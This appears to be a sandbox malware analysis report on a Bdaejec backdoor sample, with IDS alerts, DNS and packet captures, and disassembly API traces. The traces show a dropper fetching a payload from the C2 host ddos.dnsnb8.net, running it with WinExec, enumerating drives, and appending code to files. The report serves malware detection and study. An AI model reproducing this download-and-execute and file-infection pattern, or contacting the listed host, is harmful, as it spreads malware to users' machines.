GDI32.dll	CreateSolidBrush, FillRgn, CreateRectRgn, CombineRgn, PatBlt, CreatePen, SelectObject, CreatePatternBrush, CreateBitmap, CreateDCA, CreateCompatibleBitmap, GetPolyFillMode, GetStretchBltMode, GetROP2, GetBkColor, GetBkMode, GetTextColor, CreateRoundRectRgn, CreateEllipticRgn, PathToRegion, EndPath, BeginPath, GetWindowOrgEx, GetViewportOrgEx, GetWindowExtEx, TranslateCharsetInfo, SaveDC, RestoreDC, SetROP2, SetMapMode, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, GetClipBox, ExcludeClipRect, MoveToEx, CreateFontIndirectA, ExtSelectClipRgn, GetViewportExtEx, PtVisible, RectVisible, ExtTextOutA, Escape, GetTextMetricsA, SetDIBitsToDevice, SetTextColor, SetBkMode, TextOutA, SetBkColor, CreateRectRgnIndirect, CreateDIBSection, SetStretchBltMode, GetClipRgn, CreatePolygonRgn, SelectClipRgn, DeleteObject, CreateDIBitmap, GetSystemPaletteEntries, CreatePalette, StretchBlt, SelectPalette, RealizePalette, GetDIBits, Ellipse, Rectangle, LPtoDP, DPtoLP, GetCurrentObject, RoundRect, CreateFontA, GetStockObject, GetObjectA, EndPage, EndDoc, DeleteDC, StartDocA, StartPage, BitBlt, GetPixel, CreateCompatibleDC, GetTextExtentPoint32A, LineTo, SetPolyFillMode, GetDeviceCaps
WINSPOOL.DRV	DocumentPropertiesA, ClosePrinter, OpenPrinterA
comdlg32.dll	ChooseColorA, ChooseFontA, GetOpenFileNameA, GetSaveFileNameA, GetFileTitleA
ADVAPI32.dll	RegCreateKeyExA, RegQueryValueA, RegSetValueExA, RegOpenKeyExA, RegCloseKey
SHELL32.dll	DragAcceptFiles, DragQueryFileA, ShellExecuteA, Shell_NotifyIconA, SHGetSpecialFolderPathA, DragFinish
ole32.dll	CLSIDFromProgID, OleInitialize, CLSIDFromString, CoCreateInstance, OleRun, OleUninitialize
OLEAUT32.dll	VariantChangeType, VariantCopy, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayGetDim, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetElement, VariantCopyInd, VariantClear, SysAllocString, SafeArrayDestroy, SafeArrayCreate, SafeArrayPutElement, RegisterTypeLib, LHashValOfNameSys, LoadTypeLib, UnRegisterTypeLib, VariantInit
COMCTL32.dll	ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_Destroy, ImageList_Create, ImageList_BeginDrag, ImageList_DragShowNolock, _TrackMouseEvent, ImageList_SetBkColor, ImageList_GetImageCount, ImageList_EndDrag, ImageList_Read, ImageList_Duplicate, ImageList_Add
WININET.dll	InternetCrackUrlA, HttpOpenRequestA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile, InternetConnectA, InternetSetOptionA, InternetOpenA, InternetCloseHandle, InternetCanonicalizeUrlA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-12T17:37:02.998602+0100	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	1	192.168.2.5	50370	1.1.1.1	53	UDP
2025-01-12T17:37:03.582373+0100	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	1	192.168.2.5	49705	44.221.84.105	799	TCP
2025-01-12T17:37:04.331518+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49704	103.235.47.188	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2025 17:37:03.098046064 CET	49704	443	192.168.2.5	103.235.47.188
Jan 12, 2025 17:37:03.098165035 CET	443	49704	103.235.47.188	192.168.2.5
Jan 12, 2025 17:37:03.098256111 CET	49704	443	192.168.2.5	103.235.47.188
Jan 12, 2025 17:37:03.100377083 CET	49704	443	192.168.2.5	103.235.47.188
Jan 12, 2025 17:37:03.100405931 CET	443	49704	103.235.47.188	192.168.2.5
Jan 12, 2025 17:37:03.195357084 CET	49705	799	192.168.2.5	44.221.84.105
Jan 12, 2025 17:37:03.200164080 CET	799	49705	44.221.84.105	192.168.2.5
Jan 12, 2025 17:37:03.200516939 CET	49705	799	192.168.2.5	44.221.84.105
Jan 12, 2025 17:37:03.201483011 CET	49705	799	192.168.2.5	44.221.84.105
Jan 12, 2025 17:37:03.206257105 CET	799	49705	44.221.84.105	192.168.2.5
Jan 12, 2025 17:37:03.581804991 CET	799	49705	44.221.84.105	192.168.2.5
Jan 12, 2025 17:37:03.581820965 CET	799	49705	44.221.84.105	192.168.2.5
Jan 12, 2025 17:37:03.582372904 CET	49705	799	192.168.2.5	44.221.84.105
Jan 12, 2025 17:37:03.582372904 CET	49705	799	192.168.2.5	44.221.84.105
Jan 12, 2025 17:37:03.583956957 CET	49705	799	192.168.2.5	44.221.84.105
Jan 12, 2025 17:37:03.588901997 CET	799	49705	44.221.84.105	192.168.2.5
Jan 12, 2025 17:37:04.331275940 CET	443	49704	103.235.47.188	192.168.2.5
Jan 12, 2025 17:37:04.331517935 CET	49704	443	192.168.2.5	103.235.47.188
Jan 12, 2025 17:37:04.331557989 CET	443	49704	103.235.47.188	192.168.2.5
Jan 12, 2025 17:37:04.331612110 CET	49704	443	192.168.2.5	103.235.47.188
Jan 12, 2025 17:37:04.374263048 CET	49704	443	192.168.2.5	103.235.47.188
Jan 12, 2025 17:37:04.374273062 CET	443	49704	103.235.47.188	192.168.2.5
Jan 12, 2025 17:37:04.374660969 CET	443	49704	103.235.47.188	192.168.2.5
Jan 12, 2025 17:37:04.424514055 CET	49704	443	192.168.2.5	103.235.47.188
Jan 12, 2025 17:37:04.508676052 CET	49704	443	192.168.2.5	103.235.47.188
Jan 12, 2025 17:37:04.551373005 CET	443	49704	103.235.47.188	192.168.2.5
Jan 12, 2025 17:37:04.846411943 CET	443	49704	103.235.47.188	192.168.2.5
Jan 12, 2025 17:37:04.846482038 CET	443	49704	103.235.47.188	192.168.2.5
Jan 12, 2025 17:37:04.846664906 CET	49704	443	192.168.2.5	103.235.47.188
Jan 12, 2025 17:37:04.945607901 CET	49704	443	192.168.2.5	103.235.47.188
Jan 12, 2025 17:37:04.945677042 CET	443	49704	103.235.47.188	192.168.2.5
Jan 12, 2025 17:37:04.945720911 CET	49704	443	192.168.2.5	103.235.47.188
Jan 12, 2025 17:37:04.945739985 CET	443	49704	103.235.47.188	192.168.2.5
Jan 12, 2025 17:37:08.090950012 CET	49707	799	192.168.2.5	44.221.84.105
Jan 12, 2025 17:37:08.538628101 CET	799	49707	44.221.84.105	192.168.2.5
Jan 12, 2025 17:37:08.538717985 CET	49707	799	192.168.2.5	44.221.84.105
Jan 12, 2025 17:37:08.930396080 CET	799	49707	44.221.84.105	192.168.2.5
Jan 12, 2025 17:37:08.930416107 CET	799	49707	44.221.84.105	192.168.2.5
Jan 12, 2025 17:37:08.930465937 CET	49707	799	192.168.2.5	44.221.84.105
Jan 12, 2025 17:37:29.730194092 CET	49707	799	192.168.2.5	44.221.84.105

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2025 17:37:02.998601913 CET	50370	53	192.168.2.5	1.1.1.1
Jan 12, 2025 17:37:03.082057953 CET	56844	53	192.168.2.5	1.1.1.1
Jan 12, 2025 17:37:03.088790894 CET	53	56844	1.1.1.1	192.168.2.5
Jan 12, 2025 17:37:03.181588888 CET	53	50370	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 12, 2025 17:37:02.998601913 CET	192.168.2.5	1.1.1.1	0x13c3	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:37:03.082057953 CET	192.168.2.5	1.1.1.1	0x7527	Standard query (0)	www.baidu.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 12, 2025 17:37:03.088790894 CET	1.1.1.1	192.168.2.5	0x7527	No error (0)	www.baidu.com	www.a.shifen.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 12, 2025 17:37:03.088790894 CET	1.1.1.1	192.168.2.5	0x7527	No error (0)	www.a.shifen.com	www.wshifen.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 12, 2025 17:37:03.088790894 CET	1.1.1.1	192.168.2.5	0x7527	No error (0)	www.wshifen.com		103.235.47.188	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:37:03.088790894 CET	1.1.1.1	192.168.2.5	0x7527	No error (0)	www.wshifen.com		103.235.46.96	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:37:03.181588888 CET	1.1.1.1	192.168.2.5	0x13c3	No error (0)	ddos.dnsnb8.net		44.221.84.105	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ddos.dnsnb8.net:799

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	44.221.84.105	799	6768	C:\Users\user\AppData\Local\Temp\WIJSmB.exe

Timestamp	Bytes transferred	Direction	Data
Jan 12, 2025 17:37:03.201483011 CET	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	103.235.47.188	443	1896	C:\Users\user\Desktop\5vrRrFN56j.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-12 16:37:04 UTC	271	OUT	HEAD / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Accept: text/html, application/xhtml+xml, / Accept-Encoding: identity Accept-Language: zh-cn User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: www.baidu.com
2025-01-12 16:37:04 UTC	327	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Content-Length: 277 Content-Type: text/html Date: Sun, 12 Jan 2025 16:37:04 GMT Etag: "575e1f6f-115" Last-Modified: Mon, 13 Jun 2016 02:50:23 GMT Pragma: no-cache Server: bfe/1.0.8.18 Connection: close

Target ID:	0
Start time:	11:37:01
Start date:	12/01/2025
Path:	C:\Users\user\Desktop\5vrRrFN56j.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\5vrRrFN56j.exe"
Imagebase:	0x400000
File size:	5'541'376 bytes
MD5 hash:	5AD1A67084EE167D59560FBAEC7529FE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2150800723.00000000006CD000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000000.2064107799.00000000006CD000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:37:01
Start date:	12/01/2025
Path:	C:\Users\user\AppData\Local\Temp\WIJSmB.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\WIJSmB.exe
Imagebase:	0x4a0000
File size:	15'872 bytes
MD5 hash:	56B2C3810DBA2E939A8BB9FA36D3CF96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 97%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	00:37:07
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 1656
Imagebase:	0x1d0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	53.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	87.5%
Total number of Nodes:	8
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 009A9044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 009A9223
WriteFile.KERNEL32(00000000,FFC0C04F,00003E00,?,00000000), ref: 009A9252
CloseHandle.KERNEL32(00000000), ref: 009A9256
WinExec.KERNEL32(?,00000005), ref: 009A9262

Strings

WinE, xrefs: 009A9110
WIJSmB.exe, xrefs: 009A91FD, 009A9200
Kern, xrefs: 009A90F4
Writ, xrefs: 009A9148
Clos, xrefs: 009A9129
lstr, xrefs: 009A91A7
odul, xrefs: 009A922D
catA, xrefs: 009A91AF
Crea, xrefs: 009A9169
GetT, xrefs: 009A9188
.dll, xrefs: 009A9102
dleA, xrefs: 009A90D0
athA, xrefs: 009A9199
el32, xrefs: 009A90FB
GetM, xrefs: 009A90B6

Memory Dump Source

Source File: 00000000.00000002.2151562780.00000000009A9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2150632650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150648539.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150800723.00000000005E5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150800723.00000000006CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2151086509.0000000000915000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2151108494.0000000000917000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2151126092.0000000000919000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2151148441.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2151174930.0000000000924000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2151344602.000000000092A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2151363974.000000000092B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2151388999.000000000093A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2151408196.000000000093E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2151426055.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2151426055.000000000094B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2151426055.0000000000988000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2151426055.0000000000999000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2151426055.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2151540189.00000000009A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2151586093.00000000009AA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5vrRrFN56j.jbxd

Yara matches

Similarity

API ID: File$CloseCreateExecHandleWrite
String ID: .dll$Clos$Crea$GetM$GetT$Kern$WIJSmB.exe$WinE$Writ$athA$catA$dleA$el32$lstr$odul
API String ID: 3741012433-8072207
Opcode ID: 18b86470980afb6ad4aed1096133aa8dd5a73126197778d1afbc8d25ddcdda57
Instruction ID: ec65d23d521b05f15991e2b16a9be2047d4d6d504f29e13a9d01f69c714770ce
Opcode Fuzzy Hash: 18b86470980afb6ad4aed1096133aa8dd5a73126197778d1afbc8d25ddcdda57
Instruction Fuzzy Hash: AC613774D05216DBCF24CF94C888ABDF7B9BF4A315F2486AAD506AB601C3349E81CBD1

Analysis Process: WIJSmB.exePID: 6768, Parent PID: 1896COMMON

Execution Graph

Execution Coverage:	29%
Dynamic/Decrypted Code Coverage:	8.9%
Signature Coverage:	24%
Total number of Nodes:	292
Total number of Limit Nodes:	10

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004A29E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004A2A02
wsprintfA.USER32 ref: 004A2A1A
memset.MSVCRT ref: 004A2A44
lstrlen.KERNEL32(?), ref: 004A2A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 004A2A6C
strrchr.MSVCRT ref: 004A2A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 004A2A9F
lstrlen.KERNEL32(Documents and Settings), ref: 004A2AAE
memset.MSVCRT ref: 004A2AC6
memset.MSVCRT ref: 004A2ADA
FindFirstFileA.KERNEL32(?,?), ref: 004A2AEF
memset.MSVCRT ref: 004A2B13
lstrcmpiA.KERNEL32(?,?), ref: 004A2B42
FindNextFileA.KERNEL32(00000000,?,?,?,?), ref: 004A2B67
FindClose.KERNEL32(00000000), ref: 004A2B6E

Strings

Documents and Settings, xrefs: 004A2A8D, 004A2A92, 004A2A9A, 004A2AAD
C:\, xrefs: 004A2A2F
%s*, xrefs: 004A2A14

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: 1853bd877efa2eaf43bb67c481b4482e7b5e6e3582a49c8eb446abccb6b4118b
Instruction ID: 7906eeeb4cf55a2c1375bb84ceda86354bdc4915cf471e7eee47de26c25c8dc0
Opcode Fuzzy Hash: 1853bd877efa2eaf43bb67c481b4482e7b5e6e3582a49c8eb446abccb6b4118b
Instruction Fuzzy Hash: DB4195B2804349AFD720DFA4DD49DDBBBACEB96315F04083AF544C3111F678DA4897AA

Function 004A1099 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004A185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75A78400,http://%s:%d/%s/%s,?,?,?,004A1118), ref: 004A1867
Part of subcall function 004A185B: srand.MSVCRT ref: 004A1878
Part of subcall function 004A185B: rand.MSVCRT ref: 004A1880
Part of subcall function 004A185B: srand.MSVCRT ref: 004A1890
Part of subcall function 004A185B: rand.MSVCRT ref: 004A1894

WinExec.KERNEL32(?,00000005), ref: 004A10F1
lstrlen.KERNEL32(004A4748), ref: 004A10FA
wsprintfA.USER32 ref: 004A112A
wsprintfA.USER32 ref: 004A1143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 004A115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 004A1169
Sleep.KERNEL32 ref: 004A1179

Strings

cj/, xrefs: 004A1135
%s%.8X.exe, xrefs: 004A1124
ddos.dnsnb8.net, xrefs: 004A10C8, 004A10CF, 004A1140, 004A1168
http://%s:%d/%s/%s, xrefs: 004A10C2, 004A1141
C:\Users\user\AppData\Local\Temp\, xrefs: 004A1119
HGJ, xrefs: 004A112C

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HGJ$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-3635962148
Opcode ID: be519edb5e4c852a967a5809a2e1c59d659672675e1fa33a317171d13f14f1cb
Instruction ID: 1ad1fe38c8ba8fddabaef4de61253be3956fc91a7f9a63fe78d1810e6cd5780a
Opcode Fuzzy Hash: be519edb5e4c852a967a5809a2e1c59d659672675e1fa33a317171d13f14f1cb
Instruction Fuzzy Hash: 79218375904248BADB10DBA0DC45BAFBF7CEBA7315F11406AE501A2161D7B85B44CF58

Function 004A1718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WIJSmB.exe), ref: 004A1729
SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 004A174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 004A177C
__aulldiv.LIBCMT ref: 004A1796
__aulldiv.LIBCMT ref: 004A17A8

Strings

Time, xrefs: 004A173D, 004A1766
SOFTWARE\GTplus, xrefs: 004A1742, 004A176B
C:\Users\user\AppData\Local\Temp\WIJSmB.exe, xrefs: 004A1722

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user\AppData\Local\Temp\WIJSmB.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-589047163
Opcode ID: 4fde37b6a12c444bf0fea129d069e79c1f9fabb24c5c5a131ea90934f1fd31a7
Instruction ID: a0e73080e4e38144ee64c4885d92f5aed1094f57f9b0cd091b9acb65ee2dcb93
Opcode Fuzzy Hash: 4fde37b6a12c444bf0fea129d069e79c1f9fabb24c5c5a131ea90934f1fd31a7
Instruction Fuzzy Hash: AC11CB76A00209BBDB109F94CD85FEF7BBCEB17B15F108026F901B6180E6789E44C768

Function 004A6076 Relevance: 11.1, APIs: 7, Instructions: 616
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 004A60BE
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 004A60DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 004A6189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 004A61A5

Memory Dump Source

Source File: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: c160404d0471eeb2df17f32c2cd9998b7eee8f6ed123623815d5d88437764042
Instruction ID: ada0da3777295f4ec179e6c7a12e839c22f8aa7d64ea8bf2e99971e220a85831
Opcode Fuzzy Hash: c160404d0471eeb2df17f32c2cd9998b7eee8f6ed123623815d5d88437764042
Instruction Fuzzy Hash: 811236725087849FDB328F24CC45BEA3FB4EF23310F1E459ED8858B292D678A901C759

Function 004A2B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004A2BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 004A2BB4
GetDriveTypeA.KERNEL32(?), ref: 004A2BD3
CreateThread.KERNEL32(00000000,00000000,004A2B7D,?,00000000,00000000), ref: 004A2BEE
lstrlen.KERNEL32(?), ref: 004A2BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 004A2C16
CreateThread.KERNEL32(00000000,00000000,004A2845,00000000,00000000,00000000), ref: 004A2C3A

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: 7b586dcf60d7f0f7d8bfc51faff22b83e1206c3bd2a1aa6f4f26c4153dcd936e
Instruction ID: 0bba3325c0a4be945fd48566344f5f0ca035062d2ee0228432786257947a8ccc
Opcode Fuzzy Hash: 7b586dcf60d7f0f7d8bfc51faff22b83e1206c3bd2a1aa6f4f26c4153dcd936e
Instruction Fuzzy Hash: 082105B180014CAFE7209F689C84EAF7F6CFB56355B10012AF94292151E3A8DD06DB78

Function 004A1E6E Relevance: 44.1, APIs: 20, Strings: 5, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,004A32B0,00000164,004A2986,?), ref: 004A1EB9
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 004A1ECD
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 004A1EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 004A1F07
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 004A1F1D
FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 004A201E
memset.MSVCRT ref: 004A20D8
memset.MSVCRT ref: 004A20EA
memcpy.MSVCRT(?,?,00000028,?,?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004A222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004A2238
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004A224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004A22C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004A22CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004A22DD
WriteFile.KERNEL32(000000FF,004A4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004A22F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004A230D
CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004A2322
UnmapViewOfFile.KERNEL32(?,?,004A32B0,00000164,004A2986,?), ref: 004A2340
